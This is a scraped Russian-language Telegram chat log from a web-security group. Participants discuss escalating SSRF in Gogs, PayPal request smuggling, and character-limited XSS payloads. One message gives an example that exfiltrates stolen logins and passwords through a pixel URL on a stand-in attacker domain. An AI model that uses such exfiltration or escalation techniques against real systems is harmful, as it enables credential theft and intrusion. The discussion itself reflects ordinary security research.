Size: a a a

2020 April 20

h

helix in WebPwnChat
во что можно раскрутить ssrf в gogs? с вебхуками которое. в приложении нет никаких интересных эндпоинтов. есть редис, через который в теории по аналогии с гитлабом можно было бы рце сделать, но в гогсе нет crlf injection
источник

BF

Billy Fox in WebPwnChat
Гогс?
источник

M

MortusKill in WebPwnChat
вжух
лимит только 30 символов
я когда-то читал райтап как чувак в 14 символов уместился
источник

I

Ivan in WebPwnChat
Billy Fox
Гогс?
поисковики не юзаешь, чтобы злые корпорации тебя не могли старгетить и рекламу показать?)
источник

BF

Billy Fox in WebPwnChat
Ivan
поисковики не юзаешь, чтобы злые корпорации тебя не могли старгетить и рекламу показать?)
Ага)
источник

sS

second_constantine Stupakevich in WebPwnChat
S N
по request smuggling - когда James kettle показал свой кейс с paypal - как он смог прочесть логин и пароль пользователей, которые используют safari или IE

он смог "заразить" js файл paypal на свой js файл, которые потом подгружается для юзера

вот после всех действий - он там еще смог обойти csp через iframe он пишет в статье - and steal plaintext PayPal passwords from everyone who logged in using Safari or IE.

и вот никак не могу понять как он смог прочесть в открытом виде логин и пароль
какая может быть угроза, если получилось заразить js файл через cache poisoning и подменить на свой js файл
Основная сложность в отправке. Пароли и прочая секьюрная хрень шифруется\получаются хеши уже на серваке, https позволяет безопасно их отправить до самого сервака. Как я знаю есть доверенные домены, например можно делать ajax запросы прямо в гугл, а там можно и в форму слать по сути данные. Еще есть вариант отправлять данные подгружая какой-нибудь ресурс, например скрытый пиксель. Например так должно работать, http://evel.com/{login}/{password}/pixel.png
источник

q

q|z in WebPwnChat
источник

в

вжух in WebPwnChat
MortusKill
я когда-то читал райтап как чувак в 14 символов уместился
лол это как возможно
источник

GD

Green Dog in WebPwnChat
а где там стеройды?
источник

q

q|z in WebPwnChat
Green Dog
а где там стеройды?
источник

q

q|z in WebPwnChat
достаточно интересная штука, как мне кажется
источник

GD

Green Dog in WebPwnChat
хмм... естиь какой-то смысла запускать fuff и другое на гоу паралелльно?
источник

B

Bo0oM in WebPwnChat
MortusKill
я когда-то читал райтап как чувак в 14 символов уместился
Тот самый 14.rs от Марио?
источник

B

Bo0oM in WebPwnChat
не могу найти статью
источник

B

Bo0oM in WebPwnChat
но суть, что в 14 превращается какой-то байт
источник

B

Bo0oM in WebPwnChat
и в rs тоже
источник

B

Bo0oM in WebPwnChat
в итоге домен вместе с точкой - 3 байта
источник

M

MortusKill in WebPwnChat
Bo0oM
Тот самый 14.rs от Марио?
Блин, не могу статью найти
Помню что это был медиум и в лучших традициях - чел напихал кучу гифок и СмИшННЫх картинок в блог/статью
источник

I

Ivan in WebPwnChat
не понимаю как в 14 символов влезть
источник

M

MortusKill in WebPwnChat
Ivan
не понимаю как в 14 символов влезть
Ну мб там не 14 было, а 16 или около того. В общем цимес статьи был в том, что чел пролез в необходимый интервал, который был лимитирован
источник